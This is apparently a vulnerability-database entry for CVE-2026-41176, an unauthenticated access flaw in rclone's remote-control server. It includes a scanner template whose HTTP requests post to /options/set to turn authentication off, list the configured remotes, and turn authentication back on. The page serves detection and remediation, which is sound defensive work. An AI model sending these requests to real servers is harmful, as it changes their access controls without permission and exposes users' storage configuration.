Rclone RC - Broken Access Control
CVE-2026-41176
Verified
Description
Rclone >= 1.45.0 and < 1.73.5 contains a broken access control vulnerability caused by unauthenticated access to the RC endpoint `options/set` allowing mutation of global runtime configuration, letting unauthenticated attackers access sensitive administrative functions, exploit requires RC server started without global HTTP authentication.
Severity
Critical
CVSS Score
9.2
Exploit Probability
35%
Affected Product
rclone
Published Date
April 23, 2026
Template Author
theamanrawat
CVE-2026-41176.yaml
id: CVE-2026-41176
info:
name: Rclone RC - Broken Access Control
author: theamanrawat
severity: critical
description: |
Rclone >= 1.45.0 and < 1.73.5 contains a broken access control vulnerability caused by unauthenticated access to the RC endpoint `options/set` allowing mutation of global runtime configuration, letting unauthenticated attackers access sensitive administrative functions, exploit requires RC server started without global HTTP authentication.
impact: |
Unauthenticated attackers can access sensitive administrative functions, potentially leading to full control over the RC server configuration and operations.
remediation: |
Upgrade to version 1.73.5 or later.
reference:
- https://github.com/rclone/rclone/security/advisories/GHSA-25qr-6mpr-f7qx
- https://nvd.nist.gov/vuln/detail/CVE-2026-41176
classification:
cvss-score: 9.2
cve-id: CVE-2026-41176
epss-score: 0.34734
epss-percentile: 0.98226
cwe-id: CWE-306
metadata:
verified: true
max-request: 4
vendor: rclone
product: rclone
tags: cve,cve2026,rclone,auth-bypass,rce,unauth,vkev
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /config/listremotes HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{}
matchers:
- type: dsl
dsl:
- 'status_code == 403'
- 'contains(content_type, "application/json")'
condition: and
internal: true
- raw:
- |
POST /options/set HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"rc":{"NoAuth":true}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{}")'
- 'contains(content_type, "application/json")'
condition: and
internal: true
- raw:
- |
POST /config/listremotes HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{}
- |
POST /options/set HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"rc":{"NoAuth":false}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "remotes")'
- 'contains(content_type, "application/json")'
condition: and
# digest: 490a0046304402202086dfa80b35a6d5d080129b3e2b16af0611eceaae1a56a1453a1fae1150ee9b02200d32e4483bec262c8962f7af1b997b3ebbafb6ef37b74f06538d98153a7669fc:922c64590222798bb761d5b6d8e729509.2Score
CVSS Metrics
CVE ID:
cve-2026-41176
CWE ID:
cwe-306
Remediation Steps
Upgrade to version 1.73.5 or later.